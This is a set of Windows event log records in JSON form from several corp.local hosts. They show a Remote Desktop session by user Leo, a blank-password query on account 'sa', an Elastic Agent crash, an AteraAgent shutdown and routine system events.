{"EventTime":"2021-09-23T12:24:41.148007+05:45","Hostname":"IT02.corp.local","Keywords":"1152921504606846976","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":42,"SourceName":"Microsoft-Windows-TerminalServices-LocalSessionManager","ProviderGuid":"{5D896912-022D-40AA-A3A8-4FA5515C76D7}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":3968,"ActivityID":"{F420916B-D21E-4094-9937-ED9A4AA50000}","ExecutionProcessID":1020,"ExecutionThreadID":8896,"Channel":"Microsoft-Windows-TerminalServices-LocalSessionManager/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"End session arbitration:\r\n\r\nUser: CORP\\Leo\r\nSession ID: 7","Opcode":"Info","EventXML.User":"CORP\\Leo","EventXML.SessionID":"7","EventReceivedTime":"2021-09-23T12:24:42.068561+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-23T12:24:41.149321+05:45","Hostname":"IT02.corp.local","Keywords":"2305878193585782784","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7001,"SourceName":"Microsoft-Windows-Winlogon","ProviderGuid":"{DBE9B383-7CF3-4331-91CC-A3CB16A3B538}","Version":0,"TaskValue":1101,"OpcodeValue":0,"RecordNumber":82504,"ExecutionProcessID":8384,"ExecutionThreadID":4268,"Channel":"System","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"User Logon Notification for Customer Experience Improvement Program","Opcode":"Info","TSId":"7","UserSid":"S-1-5-21-2569713578-3403938347-3732993993-1139","EventReceivedTime":"2021-09-23T12:24:42.068561+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-23T12:24:42.332081+05:45","Hostname":"IT02.corp.local","Keywords":"1152921504606846976","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":21,"SourceName":"Microsoft-Windows-TerminalServices-LocalSessionManager","ProviderGuid":"{5D896912-022D-40AA-A3A8-4FA5515C76D7}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":3969,"ActivityID":"{F420916B-D21E-4094-9937-ED9A4AA50000}","ExecutionProcessID":1020,"ExecutionThreadID":1676,"Channel":"Microsoft-Windows-TerminalServices-LocalSessionManager/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Remote Desktop Services: Session logon succeeded:\r\n\r\nUser: CORP\\Leo\r\nSession ID: 7\r\nSource Network Address: 172.16.20.11","Opcode":"Info","EventXML.User":"CORP\\Leo","EventXML.SessionID":"7","EventXML.Address":"172.16.20.11","EventReceivedTime":"2021-09-23T12:24:43.083949+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-23T12:24:43.155370+05:45","Hostname":"IT02.corp.local","Keywords":"1152921504606846976","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-TerminalServices-LocalSessionManager","ProviderGuid":"{5D896912-022D-40AA-A3A8-4FA5515C76D7}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":3970,"ActivityID":"{F420916B-D21E-4094-9937-ED9A4AA50000}","ExecutionProcessID":1020,"ExecutionThreadID":1676,"Channel":"Microsoft-Windows-TerminalServices-LocalSessionManager/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Remote Desktop Services: Shell start notification received:\r\n\r\nUser: CORP\\Leo\r\nSession ID: 7\r\nSource Network Address: 172.16.20.11","Opcode":"Info","EventXML.User":"CORP\\Leo","EventXML.SessionID":"7","EventXML.Address":"172.16.20.11","EventReceivedTime":"2021-09-23T12:24:44.224582+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-23T12:24:44.094334+05:45","Hostname":"IT02.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":5059,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":1,"TaskValue":12292,"OpcodeValue":0,"RecordNumber":18968852,"ExecutionProcessID":724,"ExecutionThreadID":6928,"Channel":"Security","Message":"Key migration operation.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-2569713578-3403938347-3732993993-1139\r\n\tAccount Name:\t\tLeo\r\n\tAccount Domain:\t\tCORP\r\n\tLogon ID:\t\t0x28632A42\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t7680\r\n\tProcess Creation Time:\t???2021???-???09???-???23T06:39:43.167490400Z\r\n\r\nCryptographic Parameters:\r\n\tProvider Name:\tMicrosoft Software Key Storage Provider\r\n\tAlgorithm Name:\tECDSA_P256\r\n\tKey Name:\tMicrosoft Connected Devices Platform device certificate\r\n\tKey Type:\tUser key.\r\n\r\nAdditional Information:\r\n\tOperation:\tExport of persistent cryptographic key.\r\n\tReturn Code:\t0x0","Category":"Other System Events","Opcode":"Info","SubjectUserSid":"S-1-5-21-2569713578-3403938347-3732993993-1139","SubjectUserName":"Leo","SubjectDomainName":"CORP","SubjectLogonId":"0x28632a42","ClientProcessId":"7680","ClientCreationTime":"2021-09-23T06:39:43.1674904Z","ProviderName":"Microsoft Software Key Storage Provider","AlgorithmName":"ECDSA_P256","KeyName":"Microsoft Connected Devices Platform device certificate","KeyType":"%%2500","Operation":"%%2464","ReturnCode":"0x0","EventReceivedTime":"2021-09-23T12:24:45.718167+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-23T12:24:55.593776+05:45","Hostname":"IT02.corp.local","Keywords":"2306124492780339200","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":62170,"SourceName":"Microsoft-Windows-Shell-Core","ProviderGuid":"{30336ED4-E327-447C-9DE0-51B652C86108}","Version":0,"TaskValue":62170,"OpcodeValue":1,"RecordNumber":36842,"ExecutionProcessID":6320,"ExecutionThreadID":5836,"Channel":"Microsoft-Windows-Shell-Core/Operational","Domain":"CORP","AccountName":"Leo","UserID":"S-1-5-21-2569713578-3403938347-3732993993-1139","AccountType":"User","Message":"Logon task 'PostStartTasks' started with flags 0.","Opcode":"Start","LogonType":"0","TaskName":"PostStartTasks","EventReceivedTime":"2021-09-23T12:24:57.459533+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-23T12:24:55.385487+05:45","Hostname":"IT02.corp.local","Keywords":"2306124492780339200","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":62171,"SourceName":"Microsoft-Windows-Shell-Core","ProviderGuid":"{30336ED4-E327-447C-9DE0-51B652C86108}","Version":0,"TaskValue":62170,"OpcodeValue":2,"RecordNumber":36836,"ExecutionProcessID":6320,"ExecutionThreadID":5836,"Channel":"Microsoft-Windows-Shell-Core/Operational","Domain":"CORP","AccountName":"Leo","UserID":"S-1-5-21-2569713578-3403938347-3732993993-1139","AccountType":"User","Message":"Logon task 'LaunchExperienceHost' finished with flags 0.","Opcode":"Stop","LogonType":"0","TaskName":"LaunchExperienceHost","EventReceivedTime":"2021-09-23T12:24:57.381408+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-23T12:24:51.695046+05:45","Hostname":"IT02.corp.local","Keywords":"2305843009213759488","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":28125,"SourceName":"Microsoft-Windows-Shell-Core","ProviderGuid":"{30336ED4-E327-447C-9DE0-51B652C86108}","Version":0,"TaskValue":28137,"OpcodeValue":0,"RecordNumber":36824,"ExecutionProcessID":6320,"ExecutionThreadID":5900,"Channel":"Microsoft-Windows-Shell-Core/Operational","Domain":"CORP","AccountName":"Leo","UserID":"S-1-5-21-2569713578-3403938347-3732993993-1139","AccountType":"User","Message":"Starting to refresh app resolver cache for scenario 1 with flags 2316.","Opcode":"Info","Scenario":"1","Flags":"2316","EventReceivedTime":"2021-09-23T12:24:52.914906+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-23T12:25:08.163521+05:45","Hostname":"IT02.corp.local","Keywords":"2305843009280868352","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":9705,"SourceName":"Microsoft-Windows-Shell-Core","ProviderGuid":"{30336ED4-E327-447C-9DE0-51B652C86108}","Version":0,"TaskValue":9705,"OpcodeValue":1,"RecordNumber":36897,"ExecutionProcessID":6320,"ExecutionThreadID":1704,"Channel":"Microsoft-Windows-Shell-Core/Operational","Domain":"CORP","AccountName":"Leo","UserID":"S-1-5-21-2569713578-3403938347-3732993993-1139","AccountType":"User","Message":"Started enumeration of commands for registry key 'Software\\Microsoft\\Windows\\CurrentVersion\\Run'.","Opcode":"Start","KeyName":"Software\\Microsoft\\Windows\\CurrentVersion\\Run","EventReceivedTime":"2021-09-23T12:25:09.913192+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-23T12:25:07.772844+05:45","Hostname":"IT02.corp.local","Keywords":"2305843009280868352","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":9707,"SourceName":"Microsoft-Windows-Shell-Core","ProviderGuid":"{30336ED4-E327-447C-9DE0-51B652C86108}","Version":0,"TaskValue":9707,"OpcodeValue":1,"RecordNumber":36894,"ExecutionProcessID":6320,"ExecutionThreadID":1704,"Channel":"Microsoft-Windows-Shell-Core/Operational","Domain":"CORP","AccountName":"Leo","UserID":"S-1-5-21-2569713578-3403938347-3732993993-1139","AccountType":"User","Message":"Started execution of command 'vmtoolsd.exe\" -n vmusr'.","Opcode":"Start","Command":"vmtoolsd.exe\" -n vmusr","EventReceivedTime":"2021-09-23T12:25:08.882071+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-23T12:25:08.163318+05:45","Hostname":"IT02.corp.local","Keywords":"2305843009280868352","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":9708,"SourceName":"Microsoft-Windows-Shell-Core","ProviderGuid":"{30336ED4-E327-447C-9DE0-51B652C86108}","Version":0,"TaskValue":9707,"OpcodeValue":2,"RecordNumber":36895,"ExecutionProcessID":6320,"ExecutionThreadID":1704,"Channel":"Microsoft-Windows-Shell-Core/Operational","Domain":"CORP","AccountName":"Leo","UserID":"S-1-5-21-2569713578-3403938347-3732993993-1139","AccountType":"User","Message":"Finished execution of command 'vmtoolsd.exe\" -n vmusr' (PID 5712).","Opcode":"Stop","PID":"5712","Command":"vmtoolsd.exe\" -n vmusr","EventReceivedTime":"2021-09-23T12:25:09.913192+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-23T12:25:08.163348+05:45","Hostname":"IT02.corp.local","Keywords":"2305843009280868352","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":9706,"SourceName":"Microsoft-Windows-Shell-Core","ProviderGuid":"{30336ED4-E327-447C-9DE0-51B652C86108}","Version":0,"TaskValue":9705,"OpcodeValue":2,"RecordNumber":36896,"ExecutionProcessID":6320,"ExecutionThreadID":1704,"Channel":"Microsoft-Windows-Shell-Core/Operational","Domain":"CORP","AccountName":"Leo","UserID":"S-1-5-21-2569713578-3403938347-3732993993-1139","AccountType":"User","Message":"Finished enumeration of commands for registry key 'Software\\Microsoft\\Windows\\CurrentVersion\\Run'.","Opcode":"Stop","KeyName":"Software\\Microsoft\\Windows\\CurrentVersion\\Run","EventReceivedTime":"2021-09-23T12:25:09.913192+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-23T15:24:58.346435+05:45","Hostname":"IT02.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4779,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":12551,"OpcodeValue":0,"RecordNumber":18970308,"ActivityID":"{7870D080-A924-0001-B9D0-707824A9D701}","ExecutionProcessID":724,"ExecutionThreadID":72,"Channel":"Security","Message":"A session was disconnected from a Window Station.\r\n\r\nSubject:\r\n\tAccount Name:\t\tLeo\r\n\tAccount Domain:\t\tCORP\r\n\tLogon ID:\t\t0x28632A42\r\n\r\nSession:\r\n\tSession Name:\t\tRDP-Tcp#14\r\n\r\nAdditional Information:\r\n\tClient Name:\t\tHOME-PC\r\n\tClient Address:\t\t172.16.20.11\r\n\r\n\r\nThis event is generated when a user disconnects from an existing Terminal Services session, or when a user switches away from an existing desktop using Fast User Switching.","Category":"Other Logon/Logoff Events","Opcode":"Info","AccountName":"Leo","AccountDomain":"CORP","LogonID":"0x28632a42","SessionName":"RDP-Tcp#14","ClientName":"HOME-PC","ClientAddress":"172.16.20.11","EventReceivedTime":"2021-09-23T15:24:59.803640+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-23T15:25:00.562461+05:45","Hostname":"IT02.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4800,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":12551,"OpcodeValue":0,"RecordNumber":18970327,"ActivityID":"{7870D080-A924-0001-B9D0-707824A9D701}","ExecutionProcessID":724,"ExecutionThreadID":1188,"Channel":"Security","Message":"The workstation was locked.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-2569713578-3403938347-3732993993-1139\r\n\tAccount Name:\t\tLeo\r\n\tAccount Domain:\t\tCORP\r\n\tLogon ID:\t\t0x28632A42\r\n\tSession ID:\t7","Category":"Other Logon/Logoff Events","Opcode":"Info","TargetUserSid":"S-1-5-21-2569713578-3403938347-3732993993-1139","TargetUserName":"Leo","TargetDomainName":"CORP","TargetLogonId":"0x28632a42","SessionId":"7","EventReceivedTime":"2021-09-23T15:25:01.928868+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-23T12:11:09.293244+05:45","Hostname":"ACC01.prod.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4616,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":1,"TaskValue":12288,"OpcodeValue":0,"RecordNumber":881648,"ExecutionProcessID":4,"ExecutionThreadID":2076,"Channel":"Security","Message":"The system time was changed.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-19\r\n\tAccount Name:\t\tLOCAL SERVICE\r\n\tAccount Domain:\t\tNT AUTHORITY\r\n\tLogon ID:\t\t0x3E5\r\n\r\nProcess Information:\r\n\tProcess ID:\t0x4bc\r\n\tName:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nPrevious Time:\t\t???2021???-???09???-???23T06:32:15.807648800Z\r\nNew Time:\t\t???2021???-???09???-???23T06:26:09.292333200Z\r\n\r\nThis event is generated when the system time is changed. It is normal for the Windows Time Service, which runs with System privilege, to change the system time on a regular basis. Other system time changes may be indicative of attempts to tamper with the computer.","Category":"Security State Change","Opcode":"Info","SubjectUserSid":"S-1-5-19","SubjectUserName":"LOCAL SERVICE","SubjectDomainName":"NT AUTHORITY","SubjectLogonId":"0x3e5","PreviousTime":"2021-09-23T06:32:15.8076488Z","NewTime":"2021-09-23T06:26:09.2923332Z","ProcessId":"0x4bc","ProcessName":"C:\\Windows\\System32\\svchost.exe","EventReceivedTime":"2021-09-23T12:17:16.414379+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-23T12:32:59.420270+05:45","Hostname":"IT02.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4797,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":13824,"OpcodeValue":0,"RecordNumber":18969178,"ActivityID":"{7870D080-A924-0001-B9D0-707824A9D701}","ExecutionProcessID":724,"ExecutionThreadID":2124,"Channel":"Security","Message":"An attempt was made to query the existence of a blank password for an account.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-2569713578-3403938347-3732993993-1139\r\n\tAccount Name:\t\tLeo\r\n\tAccount Domain:\t\tCORP\r\n\tLogon ID:\t\t0x28632A42\r\n\r\nAdditional Information:\r\n\tCaller Workstation:\tIT02\r\n\tTarget Account Name:\tsa\r\n\tTarget Account Domain:\tIT02","Category":"User Account Management","Opcode":"Info","SubjectUserSid":"S-1-5-21-2569713578-3403938347-3732993993-1139","SubjectUserName":"Leo","SubjectDomainName":"CORP","SubjectLogonId":"0x28632a42","Workstation":"IT02","TargetUserName":"sa","TargetDomainName":"IT02","EventReceivedTime":"2021-09-23T12:33:00.792833+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-23T12:43:28.716802+05:45","Hostname":"IT02.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4911,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":13570,"OpcodeValue":0,"RecordNumber":18969302,"ExecutionProcessID":4,"ExecutionThreadID":348,"Channel":"Security","Message":"Resource attributes of the object were changed.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-2569713578-3403938347-3732993993-1139\r\n\tAccount Name:\t\tLeo\r\n\tAccount Domain:\t\tCORP\r\n\tLogon ID:\t\t0x28632A42\r\n\r\nObject:\r\n\tObject Server:\tSecurity\r\n\tObject Type:\tFile\r\n\tObject Name:\tE:\\elastic-agent-7.14.2-windows-x86_64.zip\r\n\tHandle ID:\t0x20d0\r\n\r\nProcess Information:\r\n\tProcess ID:\t0x18b0\r\n\tProcess Name:\tC:\\Windows\\explorer.exe\r\n\r\nResource Attributes:\r\n\tOriginal Security Descriptor:\t\r\n\tNew Security Descriptor:\t\tS:ARAI(RA;;;;;WD;(\"IMAGELOAD\",TU,0x0,1))","Category":"Authorization Policy Change","Opcode":"Info","SubjectUserSid":"S-1-5-21-2569713578-3403938347-3732993993-1139","SubjectUserName":"Leo","SubjectDomainName":"CORP","SubjectLogonId":"0x28632a42","ObjectServer":"Security","ObjectType":"File","ObjectName":"E:\\elastic-agent-7.14.2-windows-x86_64.zip","HandleId":"0x20d0","NewSd":"S:ARAI(RA;;;;;WD;(\"IMAGELOAD\",TU,0x0,1))","ProcessId":"0x18b0","ProcessName":"C:\\Windows\\explorer.exe","EventReceivedTime":"2021-09-23T12:43:30.770787+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-23T12:46:15.964306+05:45","Hostname":"IT02.corp.local","Keywords":"9259400833873739776","EventType":"ERROR","SeverityValue":4,"Severity":"ERROR","EventID":7034,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":82513,"ExecutionProcessID":704,"ExecutionThreadID":5068,"Channel":"System","Message":"The Elastic Agent service terminated unexpectedly. It has done this 1 time(s).","param1":"Elastic Agent","param2":"1","EventData.Binary":"45006C006100730074006900630020004100670065006E0074000000","EventReceivedTime":"2021-09-23T12:46:17.746134+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-22T13:39:10.638121+05:45","Hostname":"IT02.corp.local","Keywords":"9223372036854775808","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10000,"SourceName":"Microsoft-Windows-RestartManager","ProviderGuid":"{0888E5EF-9B98-4695-979D-E92CE4247224}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":69164,"ExecutionProcessID":8784,"ExecutionThreadID":7684,"Channel":"Application","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Starting session 0 - ???2021???-???09???-???22T07:54:10.631898500Z.","Opcode":"Info","RmSessionEvent.RmSessionId":"0","RmSessionEvent.UTCStartTime":"2021-09-22T07:54:10.6318985Z","EventReceivedTime":"2021-09-22T13:39:11.694461+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-22T13:39:12.107282+05:45","Hostname":"IT02.corp.local","Keywords":"9223372036854775808","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10002,"SourceName":"Microsoft-Windows-RestartManager","ProviderGuid":"{0888E5EF-9B98-4695-979D-E92CE4247224}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":69166,"ExecutionProcessID":5292,"ExecutionThreadID":9200,"Channel":"Application","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Shutting down application or service 'AteraAgent'.","Opcode":"Info","RmApplicationEvent.RmSessionId":"0","RmApplicationEvent.FullPath":"C:\\Program Files\\ATERA Networks\\AteraAgent\\AteraAgent.exe","RmApplicationEvent.DisplayName":"AteraAgent","RmApplicationEvent.AppVersion":"0","RmApplicationEvent.AppType":"3","RmApplicationEvent.TSSessionId":"0","RmApplicationEvent.Status":"262146","RmApplicationEvent.Pid":"5616","RmApplicationEvent.nFiles":"3","RmApplicationEvent.Files.File":"C:\\Program Files\\ATERA Networks\\AteraAgent\\AteraAgent.exe, C:\\Program Files\\ATERA Networks\\AteraAgent\\Newtonsoft.Json.dll, C:\\Program Files\\ATERA Networks\\AteraAgent\\PubNub-Messaging.dll","EventReceivedTime":"2021-09-22T13:39:13.757127+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-22T13:39:20.185292+05:45","Hostname":"IT02.corp.local","Keywords":"9223372036854775808","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10001,"SourceName":"Microsoft-Windows-RestartManager","ProviderGuid":"{0888E5EF-9B98-4695-979D-E92CE4247224}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":69172,"ExecutionProcessID":8784,"ExecutionThreadID":7684,"Channel":"Application","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Ending session 0 started ???2021???-???09???-???22T07:54:10.631898500Z.","Opcode":"Info","RmSessionEvent.RmSessionId":"0","RmSessionEvent.UTCStartTime":"2021-09-22T07:54:10.6318985Z","EventReceivedTime":"2021-09-22T13:39:21.804166+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-22T13:39:20.137940+05:45","Hostname":"IT02.corp.local","Keywords":"9223372036854775808","EventType":"ERROR","SeverityValue":4,"Severity":"ERROR","EventID":10007,"SourceName":"Microsoft-Windows-RestartManager","ProviderGuid":"{0888E5EF-9B98-4695-979D-E92CE4247224}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":69170,"ExecutionProcessID":5292,"ExecutionThreadID":5728,"Channel":"Application","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Application or service 'AteraAgent' could not be restarted.","Opcode":"Info","RmApplicationEvent.RmSessionId":"0","RmApplicationEvent.FullPath":"C:\\Program Files\\ATERA Networks\\AteraAgent\\AteraAgent.exe","RmApplicationEvent.DisplayName":"AteraAgent","RmApplicationEvent.AppVersion":"0","RmApplicationEvent.AppType":"3","RmApplicationEvent.TSSessionId":"0","RmApplicationEvent.Status":"262178","RmApplicationEvent.Pid":"5616","RmApplicationEvent.nFiles":"0","EventReceivedTime":"2021-09-22T13:39:21.804166+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-22T13:45:43.723817+05:45","Hostname":"IT02.corp.local","Keywords":"2305843009213759488","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":62144,"SourceName":"Microsoft-Windows-Shell-Core","ProviderGuid":"{30336ED4-E327-447C-9DE0-51B652C86108}","Version":0,"TaskValue":62132,"OpcodeValue":0,"RecordNumber":36652,"ExecutionProcessID":7580,"ExecutionThreadID":4708,"Channel":"Microsoft-Windows-Shell-Core/Operational","Domain":"CORP","AccountName":"Leo","UserID":"S-1-5-21-2569713578-3403938347-3732993993-1139","AccountType":"User","Message":"Updating install state of package Microsoft.MicrosoftEdge.Stable_8wekyb3d8bbwe to 'Completed' with HRESULT 0.","Opcode":"Info","PackageFamilyName":"Microsoft.MicrosoftEdge.Stable_8wekyb3d8bbwe","InstallState":"Completed","ErrorCode":"0","EventReceivedTime":"2021-09-22T13:45:45.113126+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-22T14:29:34.949177+05:45","Hostname":"IT02.corp.local","Keywords":"36028797018963968","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":256,"SourceName":"vmStatsProvider","Version":0,"TaskValue":1,"OpcodeValue":0,"RecordNumber":69201,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"Application","Message":"The \"vmStatsProvider\" is successfully initialized for this Virtual Machine. WMI namespace: \"root\\cimv2\".","Category":"General","Opcode":"Info","Data":"root\\cimv2","EventReceivedTime":"2021-09-22T14:29:35.824247+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-22T14:29:34.590288+05:45","Hostname":"IT02.corp.local","Keywords":"9223372036854775808","EventType":"WARNING","SeverityValue":3,"Severity":"WARNING","EventID":2002,"SourceName":"Microsoft-Windows-PerfProc","ProviderGuid":"{72D211E1-4C54-4A93-9520-4901681B2271}","Version":1,"TaskValue":0,"OpcodeValue":0,"RecordNumber":69202,"ExecutionProcessID":8040,"ExecutionThreadID":3760,"Channel":"Application","Domain":"CORP","AccountName":"Leo","UserID":"S-1-5-21-2569713578-3403938347-3732993993-1139","AccountType":"User","Message":"\\BaseNamedObjects\\WmiProviderSubSystemHostJob","Opcode":"Info","Win32 Error":"1060","EventReceivedTime":"2021-09-22T14:29:35.824247+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-22T14:01:59.648923+05:45","Hostname":"IT02.corp.local","Keywords":"9223372036854775808","EventType":"WARNING","SeverityValue":3,"Severity":"WARNING","EventID":2017,"SourceName":"Microsoft-Windows-PerfOS","ProviderGuid":"{F82FB576-E941-4956-A2C7-A0CF83F6450A}","Version":1,"TaskValue":0,"OpcodeValue":0,"RecordNumber":69190,"ExecutionProcessID":8040,"ExecutionThreadID":6540,"Channel":"Application","Domain":"CORP","AccountName":"Leo","UserID":"S-1-5-21-2569713578-3403938347-3732993993-1139","AccountType":"User","Message":"Unable to collect NUMA physical memory utilization data. The first four bytes (DWORD) of the Data section contains the status code.","Opcode":"Info","NTSTATUS":"2147483653","EventReceivedTime":"2021-09-22T14:02:01.653701+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-22T19:16:18.983531+05:45","Hostname":"DC01.corp.local","Keywords":"9223372036854775808","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":35,"SourceName":"Microsoft-Windows-Time-Service","ProviderGuid":"{06EDCFEB-0FD0-4E53-ACCA-A6F8BBF81BCB}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":646063,"ExecutionProcessID":940,"ExecutionThreadID":1964,"Channel":"System","Domain":"NT AUTHORITY","AccountName":"LOCAL SERVICE","UserID":"S-1-5-19","AccountType":"Well Known Group","Message":"The time service is now synchronizing the system time with the time source 1.uk.pool.ntp.org,0x1 (ntp.m|0x1|0.0.0.0:123->129.250.35.250:123).","Opcode":"Info","TimeSource":"1.uk.pool.ntp.org,0x1 (ntp.m|0x1|0.0.0.0:123->129.250.35.250:123)","EventReceivedTime":"2021-09-22T19:16:20.985158+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:02:52.604319+05:45","Hostname":"DC02.prod.corp.local","Keywords":"9223372036854775808","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":153,"SourceName":"Microsoft-Windows-Kernel-Boot","ProviderGuid":"{15CA44FF-4D7A-4BAA-BBA5-0998955E531E}","Version":0,"TaskValue":62,"OpcodeValue":0,"RecordNumber":169965,"ExecutionProcessID":4,"ExecutionThreadID":8,"Channel":"System","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Virtualization-based security (policies: 0) is disabled.","Opcode":"Info","Status":"0","EnableDisableReason":"0","VsmPolicy":"0","EventReceivedTime":"2021-09-21T13:03:49.020278+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
